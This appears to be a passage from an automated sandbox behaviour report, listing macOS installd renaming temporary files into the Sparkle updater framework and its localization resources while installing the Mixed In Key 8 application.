Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_PT.lproj/.BC.T_Pq35rF -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_PT.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_PT.lproj/.BC.T_nhY82q -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_PT.lproj/SUAutomaticUpdateAlert.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_PT.lproj/.BC.T_BvUddB -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_PT.lproj/SUUpdatePermissionPrompt.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_PT.lproj/.BC.T_jS4NXR -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_PT.lproj/SUUpdateAlert.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sv.lproj/.BC.T_B8O4t6 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sv.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sv.lproj/.BC.T_0IXv9u -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sv.lproj/SUAutomaticUpdateAlert.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sv.lproj/.BC.T_p7BmtO -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sv.lproj/SUUpdatePermissionPrompt.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sv.lproj/.BC.T_UHQOLB -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sv.lproj/SUUpdateAlert.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/cs.lproj/.BC.T_fhWlks -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/cs.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/cs.lproj/.BC.T_lWlP45 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/cs.lproj/SUAutomaticUpdateAlert.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/cs.lproj/.BC.T_aeHVmh -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/cs.lproj/SUUpdatePermissionPrompt.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/cs.lproj/.BC.T_P3xDO3 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/cs.lproj/SUUpdateAlert.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ko.lproj/.BC.T_CwCaDI -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ko.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ko.lproj/.BC.T_XtuCY8 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ko.lproj/SUAutomaticUpdateAlert.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ko.lproj/.BC.T_ANIMv7 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ko.lproj/SUUpdatePermissionPrompt.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ko.lproj/.BC.T_AaKHfs -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ko.lproj/SUUpdateAlert.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/tr.lproj/.BC.T_B3F5Zv -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/tr.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/tr.lproj/.BC.T_d8BIiN -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/tr.lproj/SUAutomaticUpdateAlert.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/tr.lproj/.BC.T_Z5D3s5 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/tr.lproj/SUUpdatePermissionPrompt.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/tr.lproj/.BC.T_V8N68O -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/tr.lproj/SUUpdateAlert.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pl.lproj/.BC.T_zw2T83 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pl.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pl.lproj/.BC.T_Fm1Oh7 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pl.lproj/SUAutomaticUpdateAlert.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pl.lproj/.BC.T_nfy0La -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pl.lproj/SUUpdatePermissionPrompt.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pl.lproj/.BC.T_aZJmCB -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pl.lproj/SUUpdateAlert.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_TW.lproj/.BC.T_dP4Gwo -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_TW.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_TW.lproj/.BC.T_V5jtA9 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_TW.lproj/SUAutomaticUpdateAlert.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_TW.lproj/.BC.T_bKxtcb -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_TW.lproj/SUUpdatePermissionPrompt.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_TW.lproj/.BC.T_7cGD3r -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_TW.lproj/SUUpdateAlert.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/_CodeSignature/.BC.T_PbHFVL -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/_CodeSignature/CodeResources	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/MacOS/.BC.T_KWbM0U -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/MacOS/Autoupdate	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/de.lproj/.BC.T_gXl5kc -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/de.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/he.lproj/.BC.T_0oql0D -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/he.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ar.lproj/.BC.T_7cZrNQ -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ar.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/el.lproj/.BC.T_FUj94r -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/el.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ja.lproj/.BC.T_nkT5Z8 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ja.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/en.lproj/.BC.T_xuXclu -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/en.lproj/Sparkle.strings	Jump to behavior
